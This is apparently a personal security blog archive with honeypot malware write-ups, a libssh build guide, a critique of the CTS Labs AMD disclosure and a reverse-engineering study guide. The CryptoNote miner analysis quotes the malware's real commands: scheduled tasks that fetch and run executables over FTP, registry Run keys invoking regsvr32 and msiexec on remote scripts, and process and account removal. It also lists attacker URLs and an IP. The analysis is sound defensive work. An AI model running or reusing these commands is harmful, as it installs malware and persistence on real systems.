Wednesday, April 3, 2019

Malware Analysis: RDP Backdoor (Gh0st variant)

A little while ago I caught this RDP backdoor in my honeypot that I thought was kinda interesting, so I figured I would do a write-up on it. The author of this malware took minimal measures to hide its functionality.

I searched for the md5 hash on virustotal and someone had already uploaded it here.

CFF Explorer output:


Aside from some function calls being stored as character arrays, there was hardly any obfuscation in this malware. It was packed with UPX, so unpacking was trivial.

I searched the source IP in Shodan and got this:

The first thing I noticed was "220 RMNetwork FTP". This is indicative of being part of the Ramnit botnet. RDP is also enabled. Before I took this screenshot of the Shodan results, I was able to connect to it via RDP. Its a Windows 2003 server in China. I'm under the impression that this server has been infected multiple times by different malware. I found a few things that didn't match up with being related to the Ramnit botnet.

From Thor APT Scanner:

Signature Match - THOR APT Scanner

Detection
============================
Rule: IronTiger_Gh0stRAT_variant
Ruleset: Chinese Threat Groups
Description: This is a detection for a s.exe variant seen in Op. Iron Tiger
Reference: http://goo.gl/T5fSJC
Author: Cyber Safety Solutions, Trend Micro
Score: 70

Detection Snapshot
============================
Detection Timestamp: 2018-12-17 18:19
AV detection ratio: 50 / 70

Within the binary I found a reference to a script called "jingtisanmenxiachuanxiao.vbs", which is referenced in this whitepaper about Operation PZCHAO written by Bitdefender.


After some static analysis I discovered that this creates a new user and enables RDP. 

**POST IN PROGRESS**

Thursday, December 20, 2018

Compiling libssh in Visual Studio 2017

I've decided to do a small write up on compiling libssh with Visual Studio 2017. It took me a little bit to get it working and there are no walk-throughs or tutorials online as far as I can tell. I saw quite a few people asking on forums and email archives on how to do this. I am typically a Linux user, so I don't have too much experience compiling in VS/Windows. Hopefully this will help someone that was stuck like I was!

So first thing is download the version of libssh you need from https://www.libssh.org/files/ . In my case I am using version 0.8.5.


You will also need to install Openssl. I used a precompiled binary from here: https://indy.fulgan.com/SSL/ . Installation is straightforward. Also, zlib is optional while compiling libssh. I did not include it as I didn't need it. Cmake is also required if you do not have it installed already. 

Extract the tarball into whatever directory you want it in. In my case I extracted it into C:/libs/libssh-0.8.5 . Create an empty directory to generate the build files into. For the sake of simplicity I just chose C:/libs/libssh-0.8.5/output . 

When you open Cmake, set the source code location to C:/<path>/libssh-0.8.5/ and the output location to wherever you created your output directory. 


Now click "Configure". You will be asked to choose the version of Visual Studio you are using. 


Click finish. Cmake will do it's thing for a bit. If you did NOT install zlib like I did, you will get this error. I think this is where most people are getting stuck. In the forums I saw, people were complaining about this.


Just scroll through the entries in the list and uncheck "WITH_ZLIB". The only reason I compiled this without zlib was that I was just working on a small personal project and didn't see a reason to include it.

When Cmake is done, the contents of your output directory should be full of the appropriate directories, files, VC++ Projects and "libssh.sln". Open the solution in Visual Studio. It should include these projects:



Build it via Build->Build Solution or (Crtl+Shift+B). The resulting .dll, .exp and .lib files will be located in your output directory in C:/<output path>/src/release . 


In hindsight this was incredibly simple, so I'm not sure why I had trouble with it. I think the people in the forums/emails I saw were trying to generate the build files in the wrong directory with Cmake. I was having problems getting it to build in VS, but that was probably my lack of experience with it. Anyways, hope this helped someone!   







Tuesday, March 13, 2018

CTS Labs AMD Flaws Announcement and amdflaws.com

So like everyone else in the InfoSec world at the moment, I am not amused with the recent whitepaper released by CTS Labs and its accompanying website: https://amdflaws.com/

In my opinion, this will go down as a huge blunder on CTS Labs part. After reading the terribly written whitepaper, I am thoroughly convinced that this is nothing more than an attempt at gaining notoriety via fear mongering and over-hype. They only gave AMD a 24-hour notice before releasing this by the way. Also, nobody seems to know who CTS Labs is.

https://safefirmware.com/amdflaws_whitepaper.pdf

The are four flaws being marketed are:

  • RYZENFALL
  • MASTERKEY
  • FALLOUT
  • CHIMERA 

First of all, I would like to point out that I'm sick of these stupid vulnerability names with matching logos. Marketing like this has no place in InfoSec as far as I'm concerned. My problem with this whole situation isn't with the vulnerabilities themselves, but with how this new information is being handled by CTS Labs. 

Anyways, on to the vulnerabilities. 

Here's a clip of the whitepaper regarding RYZENFALL:


Ok, so here's the thing. Yes, this vulnerability exists. Is it plausible that the average person will be at risk to this happening on their system? Not in the least. Not only will the computer have to be fully compromised, the attacker will also have to use a vendor supplied driver to execute this, specifically on a Ryzen chip (FALLOUT, CHIMERA have the same requirements for exploitation, but on different chipsets). Its all about threat modelling. This doesn't deserve the hype they are trying to push.

Here's my favorite clip from the whitepaper regarding MASTERKEY:


Really? If someone is flashing my BIOS with a custom ROM, there is a bigger problem at hand. Again, this does not deserve the hype they want.  

The main problem with all this is the manner in which this is being handled by CTS Labs. They are attempting make it seem worse than it is by trying to create enough noise and scare people who don't understand. Which is a reprehensible act on their part. The fact that these vulns require elevated admin access before exploitation can even be attempted, immediately reduces their severity. Yes they do exist, but they are not an impending immediate threat. Some people are even calling them pseudo-vulnerabilities. However I will not. 

In the end, I think it is our responsibility as community to handle these situations with professionalism and rationality, and this is a prime example of the opposite. One thing I am happy about is the amount of people calling out CTS. They deserve it and I hope it deters other "Labs" from doing this.

Saturday, October 7, 2017

Malware Analysis: CryptoNote Miner? , part 1

Once again I was poking around the binaries that my honeypot collected and I found a really interesting DLL. Mainly because there was no obfuscation at all. This has been a fun one to analyze.

So again, the first thing I noticed was the complete lack of obfuscation. Not even packed with UPX or a simple XOR. 

I uploaded it to Virustotal:


Pretty high detection rate. Looks like it was first uploaded back in May of 2017.

Doing some initial static analysis in IDA, I realized this is just a simple stager. The graph view in IDA really shows how simple it is:


At loc_100029E:


This function seems to be the main purpose of this stager. Notice the offset aVarToff3000Var that gets pushed to the stack. Looks promising!




Well what do you know, looks like some Javascript. Among other things, this Javascript reaches out to few different locations to retrieve some additional crap to dump on your computer.

http://wmi.oo000oo.club:8888/kill.html
http://wmi.oo000oo.club:8888/test.html
http://js.oo000oo.club:280/v.sct (this returned a 404)

So naturally I decided to see if I could get my hands on these. 


So using curl, I found that kill.html seems to be instructions for killing several different processes, a kill switch of sorts. The one I found th most interesting was:

NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0

It doesn't take a whole lot of imagination to figure out what this is. A brief google search lead me to  a github repository:

https://github.com/nanopool/Claymore-XMR-CPU-Miner



So looks like we might have a CryptoNote Miner on our hands! 

Lets try http://wmi.oo000oo.club:8888/test.html



Ok... another URL... Lets try to download it:


A .rar file. I wonder whats inside...



Nothing? But its 1.9 MB. This led me to believe this is not an actual .rar file. So I opened it in CFF explorer to check it out.



Hey! This has the wrong magic number for a .rar file. A .rar should have a magic number of 52 61 72 21 1A 07 00 [Rar!...], this has 4D 5A [MZ] which means this is actually an .exe.

Opening this up in IDA reveals that this file is heavily obfuscated. It will take me a bit to de-obfuscate it. I will get back to this soon.

I decided to keep digging through the original binary to see if I could find anymore hints. I found one more URL:

http://down.oo000oo.club:8888/ok.txt


Looks like some taskkills, registry adds and a few other things:



[down]
http://209.58.186.145:8888/close.bat C:\windows\debug\c.bat 0
[cmd]

net1 start schedule&net1 user asps.xnet /del

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe

taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system"  /sc onstart /F

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f



Look at that, more URLs. The mykings.top domain seems to be taken down or moved. However, the URL http://209.58.186.145:8888/close.bat works.


Lets see what this batch file has to offer.


Lets see... so it makes some firewall changes and blocks all SMB traffic, shuts down some processes, and adds two scheduled tasks, one of which I found particularly interesting:

schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F 

This connects to ftp.oo000oo.me and logs in with a username and password of test:1433. Sweet password guys. 



This was also an executable disguised as a .rar and is also heavily obfuscated. The techniques used to obfuscate this one are very similar the 32b executable I downloaded earlier. If I can figure one of these out, the other should be fairly simple. 

In the second part of this write up, I will hopefully de-obfuscate these binaries and get a better idea of what this mess is up to. I'm thinking that one of these binaries is going to be the CryptoNote mining software. I guess we will find out!

EDIT: Turns out that these binaries are protected with VMProtect 3.x. I don't think I will be able to unpack these with my current skill set.

Thursday, October 5, 2017

Wednesday, September 13, 2017

Malware Analysis: ThunderExternal

So recently I set up a dionaea honeypot and I've been catching an insane amount of stuff. I just randomly picked this one to poke at and see what it's up to. I am running Windows 7 x64 in VMware for this analysis.

First off I opened it up in CFF Explorer:


So it seems we have a PE32 file! It is packed with UPX so most likely it wont be too hard to unpack. The original filename is ThunderExternal and appears to be out of China. It says it was created by a company named "ShenZhen Xunlei Networking Technologies,LTD." Which seems to be a legit company: 

http://www.xunlei.com/

It looks like they have a streaming service of sorts called "Thunder". But since this was dumped on my honeypot with no action on my part, I highly doubt this was created by them. This seems to be some sort of adware/fake browser according to some brief googling I did. Now for PEid!


Using PEid, I was able to unpack it with the builtin UPX plugin. However as I found out later, there is further obfuscation. Here are the PEid results after unpacking:


After unpacking I checked the strings output. Here are some strings that I found odd or interesting:

baiduSafeTray.exe   *(Baidu AV process)
BaiduSd.exe
http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s
VIP143785
vsserv.exe               *(Bitdefender process)
set cdaudio door open
set cdaudio door closed wait
Game Over QQ : 4648150
\\.\PHYSICALDRIVE
SYSTEM\CurrentControlSet\Services\%s
Win7
QUHLPSVC.EXE       *(Quick Heal process)

It seems this binary can do all sorts of stuff by the looks of it. There are a ton of different anti-malware process names in this. To me it looks like this might check to see if there is any anti-malware software running. Apparently it can also open and close your cd tray? Maybe at some point it will ask for a disc or something. A lot of the imports are for networking, which makes sense. Looks like it may alter or add a registry entry as well: "SYSTEM\CurrentControlSet\Services\%s"

I used urlscan.io to scan the URL I found:


Looks like an ad for a phone? My first thought was this might be the default landing page for this browser. There is a QR code there as well. I'll dive deeper into this later on.

One thing I found in its resources that I thought was funny was this crappy IE icon ripoff that it uses:


The next thing I want to do is some basic static analysis in IDA. IDA was able to locate the WinMain function, so that was the first thing I looked at.


Looks like this is setting some folder variables:

%ALLUSERSPROFILE%\Application Data\Storm\update\

After following some of these call instructions I noticed a lot of these calls are pointers to hard-coded out of range memory addresses.

This function was interesting to me.


From some brief research I found that winse.exe is not an actual Windows service. The name is very similar to winsec.exe, which is another known malicious executable. Notice the gibberish as well. Has a bit of a repetitive pattern to it. The string "Meumeu Nevne" is referenced many times throughout the code.

There is more obfuscated code in this binary. De-obfuscating is something I need to practice so hopefully this will teach me a lot in the end. The more I think about this, I'm starting to wonder if this targets a specific piece of software or service. Maybe the "Thunder" streaming service?

Wish I could get this to run to do some dynamic analysis on it. As I expected, this raises an exception when I execute it because of the hard-coded out of range memory addresses. I will update this as I continue...

Thursday, September 7, 2017

How to Get Into Reverse Engineering: Where to Start?

One of the biggest hurdles I experienced when getting into reverse engineering was finding an entry point into this seemingly arcane realm of the computer world. It is not an easy subject by any means, nor do I claim to be an expert in any way, but hopefully by writing this blog post I can ease the process of learning about RE.

This is meant to be a high-level guide on how to build a solid foundation for getting into RE. My goal with this post is to provide direction rather than technique, so I will not go in to great detail on each subject. I am going to be focusing x86 and x86_64 on Windows and Linux (mosty Linux), as this is where my experience has come from. I will post a "Further Reading" section at the bottom of this post as well. I want to pack a ton of resources into this and I'm sure I will continually update this as I find new stuff to add.

First off is having strong fundamental knowledge of how computers work, on both the hardware and software level. Make sure you understand how hardware and software work together and how an operating system works. Here are some books/resources that are helpful:

Code: The Hidden Language of Computer Hardware and Software by Charles Petzold

Windows Internals Pt. 1 7th ed.

How Linux Works by Brian Ward

http://www.tldp.org/LDP/tlk/tlk-toc.html

Google

That last one is the most important in the list. Do research! If you don't know something, Google it! Or use Bing if you are a serial killer. But seriously, the best tool in RE is the ability to read. If you ever wonder how something works, look it up. Chances are someone else has had the same question you do, and they may have answered it. If no one else has answered it, maybe you can be the one to provide the answer to everyone else! That's the beauty of the internet.

Learn to program! This is VERY important. I'm not saying "Become a Level 20 C++ wizard!" or anything to that extent, but it is absolutely necessary to understand how programs function. There are more than enough resources out there to learn whatever programming languages you want, but there are a few languages that I highly recommend becoming very familiar with:

  • x86 and x86_64 Assembly (110% necessary)
  • C++
  • Python 

These are by no means the only languages you should become familiar with, but in my opinion I found that these are prevalent enough to be considered necessary. Also, I am personally a mediocre programmer. I mostly just write specialized programs for myself when I need to. The idea of developing a large scale program actually sounds pretty terrible to me. But what I do have is the understanding of how a program is written, compiled and eventually, run (Which is what counts right?? ;) ). Here are some programming resources:

https://www.nostarch.com/greatcode.htm <== 2 part series

http://www.learn-c.org/

http://opensecuritytraining.info/IntroX86.html

https://www.learnpython.org/

http://www.learncpp.com/


Learn how executables and binaries work! Learn about ELF binaries, PEs and DLLs! Learn about what the OS does when they run, and what happens in memory at runtime. How can you reverse engineer something if you don't know how it actually works?

Fantastic free course on how binaries work:
http://opensecuritytraining.info/LifeOfBinaries.html

Linux:
http://www.skyfree.org/linux/references/ELF_Format.pdf

https://linux-audit.com/elf-binaries-on-linux-understanding-and-analysis/

https://lwn.net/Articles/631631/

Windows:
https://msdn.microsoft.com/en-us/library/ms809762.aspx

https://support.microsoft.com/en-us/help/815065/what-is-a-dll

https://en.wikibooks.org/wiki/X86_Disassembly/Windows_Executable_Files

These next resources are geared towards the memory management and processing side of things:

What Makes it Page? by Enrico Martignetti

Windows Internals Pt. 1 7th ed. <== Again!

http://www.tldp.org/LDP/tlk/mm/memory.html


So far I have only covered the informational aspect of things and not practical application. This is the area that most people get stuck at when trying to get into RE. I got stuck here big time. Not only is this the hardest part to learn, it is also the hardest part to teach. There is no single right way to reverse engineer. It is a topic that is too vast and there are far too many variables involved to create an effective "all encompassing" book or course. There are tips and tricks people can teach you along the way, but the majority of the heavy lifting will have to be done by you. This is where critical thinking, logical analytic skills and abstract thought come in. The ability to really visualize what is going on and being able to think in an abstract manner is invaluable. Even though the world of computers is very logical, it seems incredibly abstract in contrast to the way our brains are wired. This book will be a huge help and it will teach you C++ as you go:

https://www.nostarch.com/thinklikeaprogrammer

Now that we have the knowledge and hopefully some magic new brain skills, it brings us to our next topic: Tools! There are a plethora of RE tools out there, almost an overwhelming amount to be honest. Which ones should you use? Well, it all depends on what you're doing and what you prefer.

My preference of diassembler and debugger when I am working in Windows is using IDA Pro:

https://www.hex-rays.com/products/ida/

and WinDBG:

https://developer.microsoft.com/en-us/windows/hardware/download-windbg

IDA Pro is an incredibly advanced disassembler. I highly recommend becoming familiar with it. There is an amazing book you can read to do so:

https://www.nostarch.com/idapro2.htm

Not only is it a great book on IDA, it is a great RE book in general. Here is a pretty good intro using the demo version:

http://resources.infosecinstitute.com/basics-of-ida-pro-2/#gref

My preference of diassembler and debugger while working in Linux is is radare2:

http://rada.re/r/

and GDB:

https://www.gnu.org/software/gdb/

Here is a quick intro to GDB:

https://www.cs.cmu.edu/~gilpin/tutorial/

And a full book on radare2:

https://www.gitbook.com/book/radare/radare2book/details

To Be Continued...

Well, I don't know what else to say, so this will be it for now. As I stated earlier, I will continue to add material as I think of it.

Further reading etc:

Practical Malware Analysis

Practical Reverse Engineering

https://github.com/michalmalik/linux-re-101

https://exploit-exercises.com/

The Art of Memory Forensics

https://www.alchemistowl.org/pocorgtfo/

https://github.com/rshipp/awesome-malware-analysis